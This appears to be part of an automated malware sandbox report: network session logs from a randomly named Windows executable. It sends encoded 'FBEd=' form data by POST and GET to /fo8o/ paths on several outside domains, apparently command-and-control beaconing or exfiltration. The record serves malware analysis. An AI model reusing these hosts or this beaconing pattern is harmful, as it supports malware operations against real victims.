                                                                                                  4192.168.2.1049714202.172.28.202801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:49:25.378590107 CEST501OUTGET /fo8o/?FBEd=0LNqIGaAWMhMIMLJ2VJjkgaiCF/+7LEr9lFre+yu3/9GvRNYi1uHmkVftE7qrB4Q/AkDmlcR4eDvWrml8CJ8trWN3l8ixOWtQL9yeTsuNSglH2B9sA==&4h8=YPQX8Tch HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Host: www.kasegitai.tokyo
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  May 8, 2024 10:49:25.664339066 CEST360INHTTP/1.1 404 Not Found
                                                                                                  Date: Wed, 08 May 2024 08:49:25 GMT
                                                                                                  Server: Apache
                                                                                                  Content-Length: 196
                                                                                                  Connection: close
                                                                                                  Content-Type: text/html; charset=iso-8859-1
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a
                                                                                                  Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  5192.168.2.1049716116.50.37.244801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:49:31.591990948 CEST788OUTPOST /fo8o/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Host: www.goldenjade-travel.com
                                                                                                  Origin: http://www.goldenjade-travel.com
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 193
                                                                                                  Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  Data Raw: 46 42 45 64 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4b 65 73 4d 4c 77 6e 74 6b 63 45 31 2b 61 49 63 6f 52 36 64 71 4d 45 4c 35 73 65 2f 4a 2f 34 67 4d 70 64 73 71 50 73 32 2f 73 43 39 6a 37 30 39 63 4b 2f 45 2f 7a 69 79 36 4e 4a 44 48 74 37 63 4b 6f 54 4e 62 4e 2f 53 68 78 59 46 6f 58 49 44 71 59 6f 55 62 37 2b 37 47 5a 56 62 57 32 55 47 43 63 58 30 4a 68 4c 59 6e 5a 50 58 32 76 76 30 79 6f 5a 4c 72 4e 6b 43 44 61 4f 77 5a 50 65 6f 6b 33 6c 4c 70 2b 36 45 49 54 62 77 66 66 66 57 47 32 62 66 4f 39 57 2b 6c 36 4a 57 36 6c 7a 63 5a 6b 62 70 50 30 51 69 65 48 62 56 47 42 5a 47
                                                                                                  Data Ascii: FBEd=GHiKxe4Q6VhKKesMLwntkcE1+aIcoR6dqMEL5se/J/4gMpdsqPs2/sC9j709cK/E/ziy6NJDHt7cKoTNbN/ShxYFoXIDqYoUb7+7GZVbW2UGCcX0JhLYnZPX2vv0yoZLrNkCDaOwZPeok3lLp+6EITbwfffWG2bfO9W+l6JW6lzcZkbpP0QieHbVGBZG
                                                                                                  May 8, 2024 10:49:31.934046984 CEST599INHTTP/1.1 301 Moved Permanently
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Location: https://www.goldenjade-travel.com/fo8o/
                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
                                                                                                  Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                  Date: Wed, 08 May 2024 08:49:30 GMT
                                                                                                  Connection: close
                                                                                                  Content-Length: 156
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/">here</a>.</h2></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  6192.168.2.1049717116.50.37.244801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:49:34.677815914 CEST812OUTPOST /fo8o/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Host: www.goldenjade-travel.com
                                                                                                  Origin: http://www.goldenjade-travel.com
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 217
                                                                                                  Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  Data Raw: 46 42 45 64 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 49 67 4e 4e 5a 73 74 39 55 32 79 4d 43 39 72 62 30 34 44 61 2f 4e 2f 79 65 36 36 4d 5a 44 48 74 76 63 4b 73 66 4e 62 64 44 56 77 78 59 62 68 33 49 42 6c 34 6f 55 62 37 2b 37 47 5a 41 4d 57 31 6b 47 43 73 6e 30 4a 45 6d 4f 75 35 50 55 78 76 76 30 6b 59 5a 50 72 4e 6b 67 44 5a 4b 4f 5a 4a 43 6f 6b 32 56 4c 70 76 36 4c 44 54 62 32 52 2f 65 78 50 57 71 70 45 38 71 52 6b 5a 74 32 71 6b 44 69 54 6c 36 75 65 6c 78 31 4e 77 48 62 49 48 73 73 4b 35 72 6a 4d 6e 42 58 78 53 51 67 38 41 38 43 78 71 63 36 6e 51 3d 3d
                                                                                                  Data Ascii: FBEd=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJIgNNZst9U2yMC9rb04Da/N/ye66MZDHtvcKsfNbdDVwxYbh3IBl4oUb7+7GZAMW1kGCsn0JEmOu5PUxvv0kYZPrNkgDZKOZJCok2VLpv6LDTb2R/exPWqpE8qRkZt2qkDiTl6uelx1NwHbIHssK5rjMnBXxSQg8A8Cxqc6nQ==
                                                                                                  May 8, 2024 10:49:35.016516924 CEST599INHTTP/1.1 301 Moved Permanently
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Location: https://www.goldenjade-travel.com/fo8o/
                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
                                                                                                  Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                  Date: Wed, 08 May 2024 08:49:33 GMT
                                                                                                  Connection: close
                                                                                                  Content-Length: 156
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/">here</a>.</h2></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  7192.168.2.1049718116.50.37.244801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:49:37.618297100 CEST1825OUTPOST /fo8o/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Host: www.goldenjade-travel.com
                                                                                                  Origin: http://www.goldenjade-travel.com
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 1229
                                                                                                  Referer: http://www.goldenjade-travel.com/fo8o/
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  Data Raw: 46 42 45 64 3d 47 48 69 4b 78 65 34 51 36 56 68 4b 4c 2b 38 4d 59 48 7a 74 74 63 45 79 78 36 49 63 6a 78 36 42 71 4d 49 4c 35 70 6d 57 4a 4a 41 67 4e 34 4e 73 75 63 55 32 7a 4d 43 39 30 72 30 35 44 61 2b 4e 2f 7a 32 32 36 4d 56 54 48 75 58 63 4c 4a 44 4e 4d 2f 6e 56 70 68 59 62 73 58 49 41 71 59 70 4f 62 36 4f 2f 47 5a 51 4d 57 31 6b 47 43 75 2f 30 50 52 4b 4f 6f 35 50 58 32 76 76 6f 79 6f 59 53 72 4e 38 4b 44 59 2f 37 5a 2f 79 6f 71 31 74 4c 73 64 43 4c 4f 54 62 30 53 2f 65 70 50 57 6d 36 45 38 6d 64 6b 59 49 62 71 6e 54 69 65 78 6a 78 4c 33 4e 5a 52 78 6e 6e 44 47 38 7a 4d 2f 75 4b 57 32 35 65 38 33 55 76 75 7a 52 41 38 6f 59 79 39 4c 70 35 30 67 37 47 2f 34 53 59 56 49 73 2f 49 33 72 38 67 37 5a 62 6a 2f 7a 74 4f 46 34 35 65 5a 53 46 67 66 61 42 6e 50 75 52 41 4f 73 6e 32 58 74 32 56 70 38 48 75 46 47 77 38 37 38 2b 67 4e 32 42 72 79 6c 64 77 4e 46 47 67 41 5a 53 49 78 6b 7a 66 67 73 71 50 41 50 61 68 70 39 4c 55 68 44 41 77 48 65 4d 57 4a 74 6d 53 4b 36 4f 65 43 44 54 68 56 6a 42 45 37 7a 4a 4a [TRUNCATED]
                                                                                                  Data Ascii: FBEd=GHiKxe4Q6VhKL+8MYHzttcEyx6Icjx6BqMIL5pmWJJAgN4NsucU2zMC90r05Da+N/z226MVTHuXcLJDNM/nVphYbsXIAqYpOb6O/GZQMW1kGCu/0PRKOo5PX2vvoyoYSrN8KDY/7Z/yoq1tLsdCLOTb0S/epPWm6E8mdkYIbqnTiexjxL3NZRxnnDG8zM/uKW25e83UvuzRA8oYy9Lp50g7G/4SYVIs/I3r8g7Zbj/ztOF45eZSFgfaBnPuRAOsn2Xt2Vp8HuFGw878+gN2BryldwNFGgAZSIxkzfgsqPAPahp9LUhDAwHeMWJtmSK6OeCDThVjBE7zJJJx0btYqpNJOfJCLFbfhZZiwlYB9p5dkODFcSUOpz0h/mwyF5OM906gm7ZV03J6dK1Vxfgojz6iB4QpNYBMWckyw2DneIIRpTzQmt62A+5QXlbpe8H1yMz8KdBrvpVD3U3zmeu86O+GkCmNwX7rNVUpMLVsY6snP8C4frHTXdELdzMQSpCpGC0PQC/asq9IVMGXhARD54zim7vxRgCYPpU4zitrjjQ5IuySARVC7y2pE9gbAfINmRdtg41sNofxAMd9lKQ7bH/tvdducagD5KCwzB14l1ac4KLM90/IfioutTmt5tOu87F03ioQf+J+419WhjLJy/2G5TaAGhRSzFLsXJBxw1LdR9eFj74Pv23YCK6YzHsss4vJQQuR8+fMtG+zt+zkkJbahd5otRHFgxGOfPDmROyQxWuOX6zyxRU4XfxsltqyovtA055KZLEIKSLXiIJ831UdWlmsdAt1BkWdKAqWNJoQHgNCqxyH6h7+TD8ULfBB3XPcjCgy/c8NhxzJsdTETkIQl3hDCYgY5Ab1lkuYT+NHGrG6aN1gmni6AU5MIChwQGzltkVKkq+RdNjeC6Zgcm42nGu9vtBCNsUgmK3Uf/dsJ2Nr0U1RRorK9Jhqb/5yl+u+PHJB1kcJUrfpIdcASOq4dfRoAuApCR/hiTPw/yWzxMgq [TRUNCATED]
                                                                                                  May 8, 2024 10:49:38.254314899 CEST599INHTTP/1.1 301 Moved Permanently
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Location: https://www.goldenjade-travel.com/fo8o/
                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
                                                                                                  Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                  Date: Wed, 08 May 2024 08:49:38 GMT
                                                                                                  Connection: close
                                                                                                  Content-Length: 156
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/">here</a>.</h2></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  8192.168.2.1049719116.50.37.244801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:49:40.478224993 CEST507OUTGET /fo8o/?4h8=YPQX8Tch&FBEd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwnciuyQsy8w1cq+9C58fB3trEND4VQ== HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Host: www.goldenjade-travel.com
                                                                                                  Connection: close
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  May 8, 2024 10:49:40.817634106 CEST873INHTTP/1.1 301 Moved Permanently
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  Location: https://www.goldenjade-travel.com/fo8o/?4h8=YPQX8Tch&FBEd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwnciuyQsy8w1cq+9C58fB3trEND4VQ==
                                                                                                  Server: Microsoft-IIS/10.0
                                                                                                  Access-Control-Allow-Origin: *
                                                                                                  Access-Control-Allow-Headers: Origin, X-Requested-With, Content-Type, Accept
                                                                                                  Access-Control-Allow-Methods: GET, POST, PUT, DELETE, OPTIONS
                                                                                                  Access-Control-Allow-Credentials: true
                                                                                                  Date: Wed, 08 May 2024 08:49:40 GMT
                                                                                                  Connection: close
                                                                                                  Content-Length: 295
                                                                                                  Data Raw: 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0d 0a 3c 68 32 3e 4f 62 6a 65 63 74 20 6d 6f 76 65 64 20 74 6f 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6c 64 65 6e 6a 61 64 65 2d 74 72 61 76 65 6c 2e 63 6f 6d 2f 66 6f 38 6f 2f 3f 34 68 38 3d 59 50 51 58 38 54 63 68 26 61 6d 70 3b 46 42 45 64 3d 4c 46 4b 71 79 72 63 75 37 67 31 4e 43 61 38 63 56 31 72 32 74 4e 6b 6f 68 72 6f 64 75 54 36 70 72 49 4d 4c 74 61 57 67 4b 4a 39 62 42 4b 51 72 34 64 73 6e 79 4d 50 46 70 4d 51 6a 4a 4c 47 52 37 69 65 79 78 75 70 4f 53 70 76 31 48 62 66 55 61 4d 61 46 77 6e 63 69 75 79 51 73 79 38 77 31 63 71 2b 39 43 35 38 66 42 33 74 72 45 4e 44 34 56 51 3d 3d 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 68 32 3e 0d 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0d 0a
                                                                                                  Data Ascii: <html><head><title>Object moved</title></head><body><h2>Object moved to <a href="https://www.goldenjade-travel.com/fo8o/?4h8=YPQX8Tch&amp;FBEd=LFKqyrcu7g1NCa8cV1r2tNkohroduT6prIMLtaWgKJ9bBKQr4dsnyMPFpMQjJLGR7ieyxupOSpv1HbfUaMaFwnciuyQsy8w1cq+9C58fB3trEND4VQ==">here</a>.</h2></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  9192.168.2.104972046.30.213.191801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:49:46.618686914 CEST785OUTPOST /fo8o/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Host: www.antonio-vivaldi.mobi
                                                                                                  Origin: http://www.antonio-vivaldi.mobi
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 193
                                                                                                  Referer: http://www.antonio-vivaldi.mobi/fo8o/
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  Data Raw: 46 42 45 64 3d 43 52 4e 5a 6a 69 7a 54 4b 44 54 64 6b 52 35 38 65 32 62 58 69 70 4f 6a 51 67 39 6e 58 49 5a 50 54 73 6a 6b 6e 6c 36 6b 56 4e 59 54 70 6e 41 61 59 37 75 74 36 56 71 57 44 58 49 4f 36 55 6f 74 53 70 6f 38 4f 56 2f 4e 4e 5a 53 39 32 39 6e 4c 43 63 50 43 44 48 4a 65 37 35 51 32 66 46 4f 70 35 50 7a 68 78 53 4f 58 48 69 4e 78 6d 7a 61 6d 6d 45 2f 4a 74 73 59 39 32 6c 49 62 39 6e 41 55 2b 67 6e 51 41 4b 75 6e 65 53 4e 74 6e 30 74 57 37 64 63 49 2f 48 79 63 76 4b 62 52 33 31 30 4f 6e 53 73 64 6c 43 47 51 4b 70 51 30 4d 4e 37 53 4c 4a 68 54 63 79 33 58 63 47 2b 51
                                                                                                  Data Ascii: FBEd=CRNZjizTKDTdkR58e2bXipOjQg9nXIZPTsjknl6kVNYTpnAaY7ut6VqWDXIO6UotSpo8OV/NNZS929nLCcPCDHJe75Q2fFOp5PzhxSOXHiNxmzammE/JtsY92lIb9nAU+gnQAKuneSNtn0tW7dcI/HycvKbR310OnSsdlCGQKpQ0MN7SLJhTcy3XcG+Q
                                                                                                  May 8, 2024 10:49:46.931341887 CEST560INHTTP/1.1 302 Found
                                                                                                  Cache-Control: max-age:600, public
                                                                                                  Content-Length: 163
                                                                                                  Expires: Wed, 08 May 2024 08:59:46 GMT
                                                                                                  Last-Modified: Wed, 08 May 2024 08:49:46 GMT
                                                                                                  Location: https://musee.mobi/vivaldi/fo8o/
                                                                                                  Date: Wed, 08 May 2024 08:49:46 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  X-Onecom-Cluster-Name:
                                                                                                  X-Varnish: 1754013053
                                                                                                  Age: 0
                                                                                                  Via: 1.1 webcache2 (Varnish/trunk)
                                                                                                  Connection: close
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09
                                                                                                  Data Ascii: <!DOCTYPE html><html><head><title>Found</title></head><body><p>The document has moved <a href= "https://musee.mobi/vivaldi/fo8o/" >here</a></p></body></html>


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  10192.168.2.104972146.30.213.191801816C:\Program Files (x86)\HHkNOZUuQtmiBBsjzyzJaMjnKkmcvizVnbmWryIstQXosWiaouNgiPGguESFVYsLkaIwrMXphWOABz\dZxfFeGGZbzJaFRaN.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  May 8, 2024 10:49:49.466044903 CEST809OUTPOST /fo8o/ HTTP/1.1
                                                                                                  Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                                                                                  Accept-Language: en-US,en
                                                                                                  Accept-Encoding: gzip, deflate, br
                                                                                                  Host: www.antonio-vivaldi.mobi
                                                                                                  Origin: http://www.antonio-vivaldi.mobi
                                                                                                  Cache-Control: no-cache
                                                                                                  Connection: close
                                                                                                  Content-Type: application/x-www-form-urlencoded
                                                                                                  Content-Length: 217
                                                                                                  Referer: http://www.antonio-vivaldi.mobi/fo8o/
                                                                                                  User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; Trident/4.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E; InfoPath.2)
                                                                                                  Data Raw: 46 42 45 64 3d 43 52 4e 5a 6a 69 7a 54 4b 44 54 64 32 69 68 38 63 56 7a 58 72 70 4f 73 4d 77 39 6e 63 6f 5a 4c 54 73 2f 6b 6e 6e 58 37 53 2f 4d 54 6f 46 49 61 62 35 47 74 2f 56 71 57 4c 33 49 50 33 30 6f 6b 53 70 6c 44 4f 55 44 4e 4e 5a 47 39 32 35 76 4c 43 76 33 4e 42 58 4a 51 77 5a 51 34 62 46 4f 70 35 50 7a 68 78 53 61 78 48 69 6c 78 6d 67 43 6d 6e 6c 2f 4b 7a 38 59 2b 78 6c 49 62 77 48 41 59 2b 67 6d 7a 41 4c 7a 38 65 55 52 74 6e 77 70 57 38 4d 63 4a 71 33 7a 58 78 36 61 42 36 46 46 79 35 43 45 64 74 68 2b 4f 61 4b 67 4f 43 4d 61 56 61 59 41 45 50 46 72 5a 53 41 4c 36 67 62 53 51 32 4d 71 76 62 4e 34 62 4f 7a 45 32 32 4d 4c 69 41 77 3d 3d
                                                                                                  Data Ascii: FBEd=CRNZjizTKDTd2ih8cVzXrpOsMw9ncoZLTs/knnX7S/MToFIab5Gt/VqWL3IP30okSplDOUDNNZG925vLCv3NBXJQwZQ4bFOp5PzhxSaxHilxmgCmnl/Kz8Y+xlIbwHAY+gmzALz8eURtnwpW8McJq3zXx6aB6FFy5CEdth+OaKgOCMaVaYAEPFrZSAL6gbSQ2MqvbN4bOzE22MLiAw==
                                                                                                  May 8, 2024 10:49:49.777137041 CEST560INHTTP/1.1 302 Found
                                                                                                  Cache-Control: max-age:600, public
                                                                                                  Content-Length: 163
                                                                                                  Expires: Wed, 08 May 2024 08:59:49 GMT
                                                                                                  Last-Modified: Wed, 08 May 2024 08:49:49 GMT
                                                                                                  Location: https://musee.mobi/vivaldi/fo8o/
                                                                                                  Date: Wed, 08 May 2024 08:49:49 GMT
                                                                                                  Content-Type: text/html; charset=utf-8
                                                                                                  X-Onecom-Cluster-Name:
                                                                                                  X-Varnish: 1795261335
                                                                                                  Age: 0
                                                                                                  Via: 1.1 webcache2 (Varnish/trunk)
                                                                                                  Connection: close
                                                                                                  Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 3e 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0a 3c 62 6f 64 79 3e 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 20 22 68 74 74 70 73 3a 2f 2f 6d 75 73 65 65 2e 6d 6f 62 69 2f 76 69 76 61 6c 64 69 2f 66 6f 38 6f 2f 22 20 3e 68 65 72 65 3c 2f 61 3e 3c 2f 70 3e 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0a 09
